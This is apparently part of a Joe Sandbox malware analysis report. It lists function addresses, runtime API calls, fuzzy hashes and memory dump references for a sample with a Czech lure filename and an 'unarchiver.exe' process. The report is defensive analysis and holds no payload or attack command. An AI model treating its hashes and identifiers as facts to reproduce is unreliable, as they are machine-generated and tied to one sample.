Instruction ID: 353d7c1166d41a444bed0b824092b0403062053912abaa31d1c7a1e2a2290e18
Opcode Fuzzy Hash: 38584ea5e3f0bcb2bdcd95a26988dd38a07d0493eba6fec8afcf67d837ab5845
Instruction Fuzzy Hash: F451AD3594530ADFDF40EFA8C681DEEBBF1FF46214F12459AD890AB250D732B9068B50

Function 6FDFE030 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6FDFE03E
_local_unwind2.VCRUNTIME140(?,000000FF), ref: 6FDFE135

Part of subcall function 6FDFBAD0: __FindPESection.LIBCMT ref: 6FDFBC01

_global_unwind2.VCRUNTIME140(?), ref: 6FDFE0CC
_local_unwind2.VCRUNTIME140(?,?), ref: 6FDFE0D9

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: _local_unwind2$FindSection___except_validate_context_record_global_unwind2
String ID:
API String ID: 2858483165-0
Opcode ID: d33fa127a7e227048eb4d5695752e5303a6dac0d039590cdf290c3005857dacc
Instruction ID: d9302e3ae0745619dc9095023627217a882ba01b967dc7ce9bf938b9479df068
Opcode Fuzzy Hash: d33fa127a7e227048eb4d5695752e5303a6dac0d039590cdf290c3005857dacc
Instruction Fuzzy Hash: 2031C6739013089BDB50DF69DC80EAAB7A5FF44364F068165ED198B285E731FA26C7E0

Function 73D61318 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 73D61365

Part of subcall function 73D616C0: InitializeSListHead.KERNEL32(73D640A0,73D6136F,73D63580,00000010,73D61300,?,?,?,73D61528,?,00000001,?,?,00000001,?,73D635C8), ref: 73D616C5

_initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(73D630A4,73D630A8,73D63580,00000010,73D61300,?,?,?,73D61528,?,00000001,?,?,00000001,?,73D635C8), ref: 73D6137E
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(73D6309C,73D630A0,73D63580,00000010,73D61300,?,?,?,73D61528,?,00000001,?,?,00000001,?,73D635C8), ref: 73D6139C
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 73D613CF

Memory Dump Source

Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true

Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
String ID:
API String ID: 590286634-0
Opcode ID: 185d059769e854caf21e80cb8c29815e6e6fac88159c413ceb5fd89c12fe5856
Instruction ID: b757aff95387caa4057355ca9f3d1b18f72d93a57d01f8c300e860a00c85dcc1
Opcode Fuzzy Hash: 185d059769e854caf21e80cb8c29815e6e6fac88159c413ceb5fd89c12fe5856
Instruction Fuzzy Hash: 7121D132A08B95DFEB01ABB4D40479C33B1AF122E6F14011AC8B77B1D1DB6A1059C676

Function 6FDFDF40 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6FDFDF4E
_global_unwind2.VCRUNTIME140(?), ref: 6FDFDFB5
_local_unwind2.VCRUNTIME140(?,?), ref: 6FDFDFC2
_local_unwind2.VCRUNTIME140(?,000000FF), ref: 6FDFE000

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: _local_unwind2$___except_validate_context_record_global_unwind2
String ID:
API String ID: 2485504424-0
Opcode ID: 9d9bb3e35fbb533e372ac6e0f27e93a15b7f0a0cedb17f812234e18e255c726a
Instruction ID: 8e5f614fc50c74ad39fa1c944767eb51bc7f1548dd02329901f1afe8954830b5
Opcode Fuzzy Hash: 9d9bb3e35fbb533e372ac6e0f27e93a15b7f0a0cedb17f812234e18e255c726a
Instruction Fuzzy Hash: 37218376502308DBCB40DF18D884EAAB765FF04370F464265ED559B285E731F961CBE0

Function 6FDF3A1C Relevance: 6.0, APIs: 4, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FDF3A23
unexpected.VCRUNTIME140(00000004,6FDF34A3,00000000,?,?,?,?), ref: 6FDF3A37

Part of subcall function 6FDF4980: __telemetry_main_return_trigger.VCRUNTIME140 ref: 6FDF498F
Part of subcall function 6FDF4980: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6FDF4997

_CxxThrowException.VCRUNTIME140(00000000,00000000,00000004,6FDF34A3,00000000,?,?,?,?), ref: 6FDF3A4B

Part of subcall function 6FDF48A0: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
Part of subcall function 6FDF48A0: RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000004,6FDF34A3,00000000,?,?,?,?), ref: 6FDF3A50

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Exception__telemetry_main_return_trigger$H_prolog3_catchRaiseThrowabortterminateunexpected
String ID:
API String ID: 2816766880-0
Opcode ID: e4d491aaf5fd12ac46cfbe7a8db5bee62dfe298ad7d5fd5de941e036937283ff
Instruction ID: 0f7d7f23f688f5a7c23b8dbfdf1c9cffe29880e28a5238f6438460801cdf59b5
Opcode Fuzzy Hash: e4d491aaf5fd12ac46cfbe7a8db5bee62dfe298ad7d5fd5de941e036937283ff
Instruction Fuzzy Hash: 80E0E275652305AED7C8ABA1D545F4936246F0272DF13814CE2054E2C1CBB1B142CB76

Function 6FDFA09F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 6FDFA0FA
DName::DName.LIBVCRUNTIME ref: 6FDFA245

Strings

..., xrefs: 6FDFA1FC

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: NameName::Replicator::operator[]
String ID: ...
API String ID: 3707554701-440645147
Opcode ID: 96c51877f4a6def4caf7740142e77a2b1d7ae745b862f884ff5f3af69854c31e
Instruction ID: 6e1787197ff3d6a139b8bac312de495f660d6d2523680a00697d6f6196c89b25
Opcode Fuzzy Hash: 96c51877f4a6def4caf7740142e77a2b1d7ae745b862f884ff5f3af69854c31e
Instruction Fuzzy Hash: 6A51AD76D4A746DEDB41CFA8C580EAABBF4AB4B304F02815ED451DB381C776B50ACB60

Function 6FDF975D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6FDF985D

Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4

Strings

cpu, xrefs: 6FDF9808
amp, xrefs: 6FDF97F9

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: NameName::shared_ptr
String ID: amp$cpu
API String ID: 2125921051-2542064945
Opcode ID: 21933e6a10363ce2ab85177ccb70daddcf9baa4f04d2957c9102ab34e00cc337
Instruction ID: 75ef95353da125efb7c0a24b5cd980dc220ef84731ef316935e358cb84da3c8d
Opcode Fuzzy Hash: 21933e6a10363ce2ab85177ccb70daddcf9baa4f04d2957c9102ab34e00cc337
Instruction Fuzzy Hash: 7831BC75D02309DFCB44CFA8C850EEE7BB8AF49318F12815AD455AB384CB30BA06CB91

Function 6FDF822C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6FDF8243
DName::DName.LIBVCRUNTIME ref: 6FDF82C8

Strings

A, xrefs: 6FDF82A8

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: 95dfb35d4126a00df39201273d639f6d8d45dd74f0af843c4518f24fa8793556
Instruction ID: 32e529683428f9a06a70b73b88c208b1a446d887e482e7b725880df922dfab2a
Opcode Fuzzy Hash: 95dfb35d4126a00df39201273d639f6d8d45dd74f0af843c4518f24fa8793556
Instruction Fuzzy Hash: 1221987490A708EECF80CFA8C840E9D7BB2FF47348F028199E4459B281C731BA578B52

Function 6FDF6AC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6FDF6B04
DName::operator+=.LIBCMT ref: 6FDF6B44

Strings

void, xrefs: 6FDF6B26

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: NameName::Name::operator+=
String ID: void
API String ID: 2247604192-3531332078
Opcode ID: 01d7a79b6b647321358df6014538ad7f66407a836b880ee08012d4ebf4f274fb
Instruction ID: 3e96fb68807fc939b427001ccb87553a2d126ef9ee1353b83c209463db161082
Opcode Fuzzy Hash: 01d7a79b6b647321358df6014538ad7f66407a836b880ee08012d4ebf4f274fb
Instruction Fuzzy Hash: 12113DB5806319EACB44DFA8C845FEEBB78EF05314F42855AD411A7280DB70B746CBA0

Function 6FDF5097 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 6FDF50B4
swprintf.LIBCMT ref: 6FDF50D7

Part of subcall function 6FDFB717: __vswprintf_s_l.MSPDB140-MSVCRT ref: 6FDFB729

Strings

%lf, xrefs: 6FDF50AA, 6FDF50AF, 6FDF50D4

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: ___swprintf_l__vswprintf_s_lswprintf
String ID: %lf
API String ID: 391901838-2891890143
Opcode ID: 740ad6c4508fb47d1460a737e6d22837ec8695ffead7b1349f343544caa6af5a
Instruction ID: 705dedc8bd9d8ab67cb91bbb95c14d354df081e0a51dacb1ceba169546c68744
Opcode Fuzzy Hash: 740ad6c4508fb47d1460a737e6d22837ec8695ffead7b1349f343544caa6af5a
Instruction Fuzzy Hash: 29F0F0B5101209BBDB05AB85CC49FBF7F6CDF85298F024098F6451B280EB757E1193B2

Function 6FDF48A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

__telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900

Strings

Bad dynamic_cast!, xrefs: 6FDF48C5

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: ExceptionRaise__telemetry_main_return_trigger
String ID: Bad dynamic_cast!
API String ID: 201792006-2956939130
Opcode ID: 209c97747a4f86bb8ff4ff0d9213ad23ee50a445ec043783dd9caaca21b8fc0d
Instruction ID: aa00f8dc5135908be6fac34d2aac3e9ab9f8b93efa5b524a90c88bf33811ebe1
Opcode Fuzzy Hash: 209c97747a4f86bb8ff4ff0d9213ad23ee50a445ec043783dd9caaca21b8fc0d
Instruction Fuzzy Hash: 4F01BC75900308ABCB019F98C580B9EBBB9FF46314F12405AE911AB290D770E901CB90

Function 6FDF9FEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,??_C,00000004,00000000,00000000,?,6FDFA449,00000000,00000000,?,00000000), ref: 6FDFA005
DName::DName.LIBVCRUNTIME ref: 6FDFA04D

Strings

??_C, xrefs: 6FDF9FFF

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: NameName::strncmp
String ID: ??_C
API String ID: 3707088317-1959642359
Opcode ID: 06cfa51467a09878a47ca7c94e90c433721d0199dc786df64acf31801f0e2657
Instruction ID: 10a08155bace26bd8f7450c48febd7821eeb2a3fbc557c882d402a4903f902e3
Opcode Fuzzy Hash: 06cfa51467a09878a47ca7c94e90c433721d0199dc786df64acf31801f0e2657
Instruction Fuzzy Hash: 5601ADB0A04306AFDF41CB68D841F463BA5BB03368F010158F906DF280D776BA6A9714

Function 6FDF50F7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 6FDF5110
swprintf.LIBCMT ref: 6FDF5133

Part of subcall function 6FDFB717: __vswprintf_s_l.MSPDB140-MSVCRT ref: 6FDFB729

Strings

%lf, xrefs: 6FDF5106, 6FDF510B, 6FDF5130

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: ___swprintf_l__vswprintf_s_lswprintf
String ID: %lf
API String ID: 391901838-2891890143
Opcode ID: 805510e89bcc2eb16282b3584f25f35884aa96ae4593e455adf80e3ad6ed008e
Instruction ID: 9b20e487c1485290624aa803dcf2ae81039cd5949c2ee2c7288d24e6049cbe2f
Opcode Fuzzy Hash: 805510e89bcc2eb16282b3584f25f35884aa96ae4593e455adf80e3ad6ed008e
Instruction Fuzzy Hash: 41F024B5101208BBDB04AB85CC49FBF3F6CDF85298F024098FA491B280DB35BE1193B2

Function 6FDF45AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6FDF45B6
_CxxThrowException.VCRUNTIME140(?,6FDFFCE8), ref: 6FDF45DD

Part of subcall function 6FDF48A0: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
Part of subcall function 6FDF48A0: RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900

Strings

Access violation - no RTTI data!, xrefs: 6FDF45AD

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 1667904068-2158758863
Opcode ID: 570b67a869c5cb75e640ed19d2965f5bf415ae35a37120b86554b9839bfe0b3e
Instruction ID: 875aa418f05938be3d590e970ea0618f2c3a69bc1fe8d2df63e6d5c8c60dfd33
Opcode Fuzzy Hash: 570b67a869c5cb75e640ed19d2965f5bf415ae35a37120b86554b9839bfe0b3e
Instruction Fuzzy Hash: 22C0127280A248ABCA84D7E0E746CCD73B8B90A210B620552E610B6080EB71B91B4630

Function 6FDF4654 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6FDF4633
_CxxThrowException.VCRUNTIME140(6FDFFC38,6FDFFCCC,6FDFFC38,00000014,?,6FDFFCE8), ref: 6FDF4677

Part of subcall function 6FDF48A0: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
Part of subcall function 6FDF48A0: RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900

Strings

Access violation - no RTTI data!, xrefs: 6FDF4657

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 1667904068-2158758863
Opcode ID: 4d2e9591ee14fd16e3d82ea2d7f47741cc99c5f025751208e51db9f02efc79f7
Instruction ID: 3d1572b27034b81d3c12c8eea0c098eb21178b1bd70c7613ba5ae0df9fbbdc07
Opcode Fuzzy Hash: 4d2e9591ee14fd16e3d82ea2d7f47741cc99c5f025751208e51db9f02efc79f7
Instruction Fuzzy Hash: 29D0C77680A14CAB8A98C7E4E745CCD7368F506110F5249529740AB440F675B9574666

Function 6FDF44CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6FDF44DA
_CxxThrowException.VCRUNTIME140(?,6FDFFC74), ref: 6FDF44EA

Part of subcall function 6FDF48A0: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
Part of subcall function 6FDF48A0: RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900

Strings

Access violation - no RTTI data!, xrefs: 6FDF44D1

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 1667904068-2158758863
Opcode ID: 6fd9305238d9d8372814ee7f19c6aab71bf4c4b4a1250883e6fcdee972fcb814
Instruction ID: 841960330927b2d2ad848dc6b167ce4d824c4b2724a426786c5376859243bedf
Opcode Fuzzy Hash: 6fd9305238d9d8372814ee7f19c6aab71bf4c4b4a1250883e6fcdee972fcb814
Instruction Fuzzy Hash: A5C012728062086BCA84C7D0E546CCD73A8A909110B610452D610A2080E761B91A8670

Analysis Process: unarchiver.exePID: 3432, Parent PID: 496COMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	21%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	76
Total number of Limit Nodes:	4

Callgraph

Hide Legend

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0131B246 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 0131B2F3

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 18515d4d6c673bc321bf38965c8168618a841b54851c2ac6b872e76f820ebd14
Instruction ID: d6044f3c7a6f0c30aef9fb7cc3d48df4a7e92ad31352e74f96775b6a734b0f25
Opcode Fuzzy Hash: 18515d4d6c673bc321bf38965c8168618a841b54851c2ac6b872e76f820ebd14
Instruction Fuzzy Hash: C131A171404344AFE7228B21DC45FA6BFBCEF06714F04889AF985CB162D324A9198B71

Function 0131AD04 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 0131ADA7

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a489f36121eea014d12b0b6e10c06d2fa9d5d33c3b4937eb2a4f4efdac46459b
Instruction ID: ef2e56a8da8c9b4b553294ddf9b5bd0548ff0b6571c74d86fcf76e5fba767e51
Opcode Fuzzy Hash: a489f36121eea014d12b0b6e10c06d2fa9d5d33c3b4937eb2a4f4efdac46459b
Instruction Fuzzy Hash: 3431B1B1404384AFEB228F65DC45FA7BFBCEF05624F04899AF985CB152D324A549CB71

Function 0131AB76 Relevance: 1.6, APIs: 1, Instructions: 93
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 0131AC36

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: 34bb5b53b204b42860f6392a621555c742af50031f2fb4a6998e68b378c23628
Instruction ID: 5203096b2f9c6fb748a8174c512b6520dc90136cf4c9801fb3b2e786e4851767
Opcode Fuzzy Hash: 34bb5b53b204b42860f6392a621555c742af50031f2fb4a6998e68b378c23628
Instruction Fuzzy Hash: CC316F7150E3C05FD3038B718C65A55BFB4AF47610F1A85CBD884CF1A3D269A919C762

Function 0131A5DC Relevance: 1.6, APIs: 1, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0131A67D

Memory Dump Source

Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5ca91548814092012d4e6b72d6723b921f285540cd9eaed74cda9e94c47cceaa
Instruction ID: 8427033573ab5d29d2880481dceb37bf86a1e12174faa00b974cb4c284cac3a9
